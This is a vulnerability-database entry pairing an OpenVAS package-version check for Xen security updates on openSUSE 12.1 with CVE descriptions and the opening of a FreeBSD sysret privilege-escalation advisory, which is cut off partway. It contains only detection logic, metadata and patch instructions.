ID OPENVAS:850281 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2017-12-27T00:00:00
Description
Check for the Version of xen
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_suse_2012_0886_1.nasl 8249 2017-12-27 06:29:56Z teissa $
#
# SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_affected = "xen on openSUSE 12.1";
tag_insight = "This update of XEN fixed multiple security flaws that could
be exploited by local attackers to cause a Denial of
Service or potentially escalate privileges. Additionally,
several other upstream changes were backported.";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_id(850281);
script_version("$Revision: 8249 $");
script_tag(name:"last_modification", value:"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $");
script_tag(name:"creation_date", value:"2012-12-13 17:02:09 +0530 (Thu, 13 Dec 2012)");
script_cve_id("CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934");
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_xref(name: "openSUSE-SU", value: "2012:0886_1");
script_name("SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)");
script_tag(name: "summary" , value: "Check for the Version of xen");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
script_family("SuSE Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/suse", "ssh/login/rpms");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "openSUSE12.1")
{
if ((res = isrpmvuln(pkg:"xen-debugsource", rpm:"xen-debugsource~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-devel", rpm:"xen-devel~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-kmp-default", rpm:"xen-kmp-default~4.1.2_17_k3.1.10_1.16~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-kmp-default-debuginfo", rpm:"xen-kmp-default-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-kmp-desktop", rpm:"xen-kmp-desktop~4.1.2_17_k3.1.10_1.16~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-kmp-desktop-debuginfo", rpm:"xen-kmp-desktop-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-libs", rpm:"xen-libs~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-libs-debuginfo", rpm:"xen-libs-debuginfo~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-tools-domU", rpm:"xen-tools-domU~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-tools-domU-debuginfo", rpm:"xen-tools-domU-debuginfo~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen", rpm:"xen~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-doc-html", rpm:"xen-doc-html~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-doc-pdf", rpm:"xen-doc-pdf~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-libs-32bit", rpm:"xen-libs-32bit~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-libs-debuginfo-32bit", rpm:"xen-libs-debuginfo-32bit~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-tools", rpm:"xen-tools~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-tools-debuginfo", rpm:"xen-tools-debuginfo~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-libs-debuginfo-x86", rpm:"xen-libs-debuginfo-x86~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-libs-x86", rpm:"xen-libs-x86~4.1.2_17~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-kmp-pae", rpm:"xen-kmp-pae~4.1.2_17_k3.1.10_1.16~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"xen-kmp-pae-debuginfo", rpm:"xen-kmp-pae-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1", rls:"openSUSE12.1")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:850281", "type": "openvas", "bulletinFamily": "scanner", "title": "SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)", "description": "Check for the Version of xen", "published": "2012-12-13T00:00:00", "modified": "2017-12-27T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=850281", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["2012:0886_1"], "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "lastseen": "2018-01-02T10:58:15", "viewCount": 3, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2018-01-02T10:58:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28131", "SECURITYVULNS:DOC:28207", "SECURITYVULNS:VULN:12411"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0721.NASL", "OPENSUSE-2012-403.NASL", "SUSE_11_XEN-201206-120606.NASL", "ORACLEVM_OVMSA-2012-0022.NASL", "DEBIAN_DSA-2501.NASL", "SUSE_XEN-201206-8180.NASL", "FEDORA_2012-9430.NASL", "FEDORA_2012-9386.NASL", "FEDORA_2012-9399.NASL", "OPENSUSE-2012-404.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0730-1", "OPENSUSE-SU-2012:0886-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850281", "OPENVAS:136141256231071479", "OPENVAS:864599", "OPENVAS:1361412562310864599", "OPENVAS:864494", "OPENVAS:1361412562310864494", "OPENVAS:864509", "OPENVAS:1361412562310864509", "OPENVAS:870752", "OPENVAS:71479"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2508-1:4DE0E", "DEBIAN:DSA-2501-1:A44C3"]}, {"type": "fedora", "idList": ["FEDORA:00A04209F2", "FEDORA:8E44A20A90", "FEDORA:638FD21667", "FEDORA:63A4E21779", "FEDORA:A2013212DB", "FEDORA:0275A21469", "FEDORA:4C1E320FD7", "FEDORA:C1281214A6", "FEDORA:A80012051E", "FEDORA:403F220D9F"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1061", "ELSA-2012-0721-1", "ELSA-2012-1061-1", "ELSA-2012-0721"]}, {"type": "centos", "idList": ["CESA-2012:0721"]}, {"type": "redhat", "idList": ["RHSA-2012:0720", "RHSA-2012:0721"]}, {"type": "cert", "idList": ["VU:649219"]}, {"type": "freebsd", "idList": ["AED44C4E-C067-11E1-B5E0-000C299B62E1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46508", "EDB-ID:28718", "EDB-ID:20861"]}, {"type": "cisa", "idList": ["CISA:6C290D75BE52A220342D9856F873C16E"]}, {"type": "zdt", "idList": ["1337DAY-ID-32324"]}, {"type": "canvas", "idList": ["MS12_042", "SYSRET"]}, {"type": "threatpost", "idList": ["THREATPOST:D620254532F7EFC9F36DE3B4164B6875", "THREATPOST:A591D9D4EF6EA028B6F5C9C16D8FB392"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152001"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/FREEBSD/LOCAL/INTEL_SYSRET_PRIV_ESC"]}, {"type": "mskb", "idList": ["KB2711167"]}], "modified": "2018-01-02T10:58:15", "rev": 2}, "vulnersScore": 8.2}, "pluginID": "850281", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0886_1.nasl 8249 2017-12-27 06:29:56Z teissa $\n#\n# SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on openSUSE 12.1\";\ntag_insight = \"This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. Additionally,\n several other upstream changes were backported.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850281);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:02:09 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0886_1\");\n script_name(\"SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-doc-pdf\", rpm:\"xen-doc-pdf~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-debuginfo-x86\", rpm:\"xen-libs-debuginfo-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-x86\", rpm:\"xen-libs-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-pae-debuginfo\", rpm:\"xen-kmp-pae-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "naslFamily": "SuSE Local Security Checks"}
{"cve": [{"lastseen": "2020-10-03T12:06:05", "description": "Xen 4.0, and 4.1, when running a 64-bit PV guest on \"older\" AMD CPUs, does not properly protect against a certain AMD processor bug, which allows local guest OS users to cause a denial of service (host hang) via sequential execution of instructions across a non-canonical boundary, a different vulnerability than CVE-2012-0217.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-2934", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2934"], "modified": "2014-05-05T05:11:00", "cpe": ["cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-2934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2934", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:4.1.0:-:*:*:*:*:x64:*", "cpe:2.3:o:xen:xen:4.0.0:-:*:*:*:*:x64:*"]}, {"lastseen": "2020-10-03T12:05:59", "description": "Xen 3.4, 4.0, and 4.1, when the guest OS has not registered a handler for a syscall or sysenter instruction, does not properly clear a flag for exception injection when injecting a General Protection Fault, which allows local PV guest OS users to cause a denial of service (guest crash) by later triggering an exception that would normally be handled within Xen.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-0218", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0218"], "modified": "2013-10-11T03:40:00", "cpe": ["cpe:/o:xen:xen:3.4.0", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-0218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0218", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:15", "description": "The x86-64 kernel system-call functionality in Xen 4.1.2 and earlier, as used in Citrix XenServer 6.0.2 and earlier and other products; Oracle Solaris 11 and earlier; illumos before r13724; Joyent SmartOS before 20120614T184600Z; FreeBSD before 9.0-RELEASE-p3; NetBSD 6.0 Beta and earlier; Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1; and possibly other operating systems, when running on an Intel processor, incorrectly uses the sysret path in cases where a certain address is not a canonical address, which allows local users to gain privileges via a crafted application. NOTE: because this issue is due to incorrect use of the Intel specification, it should have been split into separate identifiers; however, there was some value in preserving the original mapping of the multi-codebase coordinated-disclosure effort to a single identifier.\nPer: http://technet.microsoft.com/en-us/security/bulletin/ms12-042\n\n'This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2. Systems with AMD or ARM-based CPUs are not affected by this vulnerability.'", "edition": 6, "cvss3": {}, "published": "2012-06-12T22:55:00", "title": "CVE-2012-0217", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0217"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.0.3", "cpe:/o:xen:xen:4.0.4", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/a:citrix:xenserver:6.0", "cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:xen:xen:4.0.1", "cpe:/o:netbsd:netbsd:6.0", "cpe:/o:xen:xen:4.0.2", "cpe:/o:xen:xen:4.1.0", "cpe:/o:sun:sunos:5.11", "cpe:/o:xen:xen:4.0.0", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:xen:xen:4.1.2", "cpe:/o:freebsd:freebsd:9.0", "cpe:/o:joyent:smartos:20120614", "cpe:/o:microsoft:windows_7:*", "cpe:/o:illumos:illumos:r13723"], "id": "CVE-2012-0217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0217", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:x64:*:*:*:*:*", "cpe:2.3:o:illumos:illumos:r13723:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.11:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:joyent:smartos:20120614:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:6.0:beta:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_1, 8.1-RELEASE-p11)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 